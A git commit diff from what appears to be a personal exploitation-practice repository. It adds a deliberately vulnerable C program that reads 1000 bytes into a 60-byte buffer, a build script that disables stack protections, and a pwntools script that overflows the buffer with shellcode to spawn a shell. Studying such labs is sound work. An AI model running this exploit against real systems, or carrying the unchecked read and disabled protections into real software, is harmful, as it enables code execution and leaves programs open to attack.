Finished stackoverflow/no-protection

This commit is contained in:
2021-08-30 22:56:18 +08:00
parent 6f60eb8de9
commit 6bec98d2e1
7 changed files with 35 additions and 0 deletions

3
.gitignore vendored
View File

@@ -1,3 +1,6 @@
# gdb
.gdb_history
# Prerequisites # Prerequisites
*.d *.d

View File

@@ -0,0 +1,15 @@
#!/usr/bin/env python2
from pwn import *
from LibcSearcher import *
import os
context.log_level="debug"
context(arch="amd64",os="linux")
p=process('./hello')
shellcode=asm(shellcraft.sh())
len_sc=len(shellcode)
payload=0x48*'0'+p64(0x00007ffff7a08118)+shellcode
with open('payload.txt', 'w') as f:
f.write(payload)
p.sendline(payload)
p.interactive()

View File

@@ -0,0 +1,2 @@
#!/bin/sh
gcc hello.c -g -o hello -zexecstack -fno-stack-protector -no-pie

BIN
stackoverflow/no-protection/hello Executable file

Binary file not shown.

View File

@@ -0,0 +1,13 @@
#include <stdio.h>
#include <string.h>
#include <unistd.h>
void SayHello(void){
char tmpName[60];
read(0, tmpName, 1000);
printf("Hello %s\n", tmpName);
}
int main(int argc, char** argv){
SayHello();
return 0;
}

Binary file not shown.

View File

@@ -0,0 +1,2 @@
break SayHello